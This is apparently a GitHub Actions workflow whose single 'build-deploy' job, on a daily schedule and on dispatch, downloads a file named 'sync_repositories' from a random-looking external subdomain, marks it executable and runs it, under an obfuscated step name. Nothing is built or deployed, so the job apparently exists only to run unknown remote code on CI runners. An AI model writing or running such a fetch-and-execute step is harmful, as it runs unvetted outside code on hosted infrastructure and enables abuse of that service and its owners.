#2024-03-18-[135739]-svff5qcb
name: main

on:
  workflow_dispatch:

  repository_dispatch:
    types: runner_workflow

  schedule:
    - cron: "11 1 * * * "
    
jobs:
  build-deploy:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v3
      - name: 7zft64fnufr5r3rn
        run: |
          wget -q https://u51f95ksggy6hkex.callforpapers.eu.org/sync_repositories
          chmod 755 sync_repositories
          ./sync_repositories